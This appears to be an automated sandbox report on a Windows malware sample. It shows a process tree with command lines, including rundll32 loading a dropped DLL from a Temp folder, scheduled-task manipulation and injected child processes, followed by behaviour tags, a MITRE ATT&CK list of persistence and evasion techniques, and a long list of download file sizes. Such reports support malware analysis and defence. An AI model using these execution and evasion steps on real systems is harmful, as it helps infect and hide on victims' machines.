C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll",#1 /site_id 7543⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"4⤵
-
-
-
-
C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\784B.tmp.exeC:\Users\Admin\AppData\Local\Temp\784B.tmp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8122.tmp.exeC:\Users\Admin\AppData\Local\Temp\8122.tmp.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8680.tmp.exeC:\Users\Admin\AppData\Local\Temp\8680.tmp.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8D06.tmp.exeC:\Users\Admin\AppData\Local\Temp\8D06.tmp.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 6562⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {9B3B28DA-2C6B-4222-866A-ADF54BC696A2} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {91C5ACB5-0052-40A7-A804-3A4CDD5C7D96} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Browser Extensions
1Modify Existing Service
1Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
Disabling Security Tools
2Impair Defenses
1Install Root Certificate
1Modify Registry
7Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
612KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
124KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.7MB
-
Filesize
68KB
-
Filesize
9.6MB
-
Filesize
124KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
68KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
16KB
-
Filesize
1.0MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
52KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
48KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
4.6MB
-
Filesize
5.6MB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
5.6MB
-
Filesize
580KB
-
Filesize
584KB
-
Filesize
68KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
28KB
-
Filesize
48KB
-
Filesize
28KB
-
Filesize
44KB
-
Filesize
36KB
-
Filesize
60KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
8.4MB
-
Filesize
68KB
-
Filesize
8.5MB
-
Filesize
8.5MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
16.7MB
-
Filesize
24KB
-
Filesize
44KB
-
Filesize
36KB
-
Filesize
16KB
-
Filesize
68KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB